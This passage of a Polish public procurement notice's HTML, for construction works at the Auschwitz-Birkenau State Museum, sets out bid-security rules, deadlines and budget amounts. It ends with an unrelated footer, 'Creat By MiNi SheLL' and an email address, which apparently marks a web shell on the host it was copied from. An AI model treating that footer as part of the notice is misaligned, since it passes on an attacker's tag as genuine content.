ustawy Pzp.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium:<br/>1.1.	dla Części 1 o wartości 5 000,00 zł (słownie złotych: pięć tysięcy 00/100) na czas związania ofertą.<br/>1.2.	dla Części 2 o wartości 5 000,00 zł (słownie złotych: pięć tysięcy 00/100) na czas związania ofertą.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>3.1.	Pieniądzu;<br/>3.2.	Gwarancjach bankowych;<br/>3.3.	Gwarancjach ubezpieczeniowych;<br/>3.4.	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Dokument potwierdzający wadium wniesione przez Wykonawcę musi wskazywać jakiej Części zamówienia (Część 1, Część 2) dotyczy.<br/>4.	W przypadku wniesienia wadium w formach określonych powyżej w pkt 3.2. – 3.4., dokument winien być wystawiony na Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, ul. Więźniów Oświęcimia 20, 32-600 Oświęcim.<br/>5.	Wadium w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego: <br/>5.1.	nr konta PL80 1130 1150 0012 1268 9790 0005, Bank Gospodarstwa Krajowego;<br/>5.2.	Kod Swift (wymagany przy przelewach międzynarodowych): GOSKPLPW.<br/>6.	Wadium w formie niepieniężnej:<br/>6.1.	Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w formie elektronicznej;<br/>6.2.	Treść dokumentu wadium winna zawierać nazwę niniejszego postępowania oraz numer nadany postępowaniu przez Zamawiającego.<br/>7.	Udzielona gwarancja:<br/>7.1.	musi być gwarancją samoistną, nieodwołalną, bezwarunkową i płatną na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów;<br/>7.2.	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Ustawie;<br/>7.3.	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty Zamawiającemu całej kwoty wadium w przypadku wystąpienia okoliczności, o których mowa w art. 98 ust. 6 Pzp;<br/>7.4.	treść gwarancji nie może zawierać klauzuli zwalniającej gwaranta od odpowiedzialności wskutek zwrotu dokumentu gwarancji;<br/>7.5.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/spółki cywilne).<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania zostały opisane w dziale V, VI, VII, X, XVI, XVII SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały opisane w paragrafie 22 wzoru umowy - załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4.	Zamawiający zamierza przeznaczyć na roboty budowlane wraz z usługami opisanymi w OPZ kwotę: dla Części 1: 271 138,37 zł brutto (220 437,70 zł netto), dla Części 2: 964 675,15 zł brutto (784 288,74 zł netto).

Creat By MiNi SheLL
Email: jattceo@gmail.com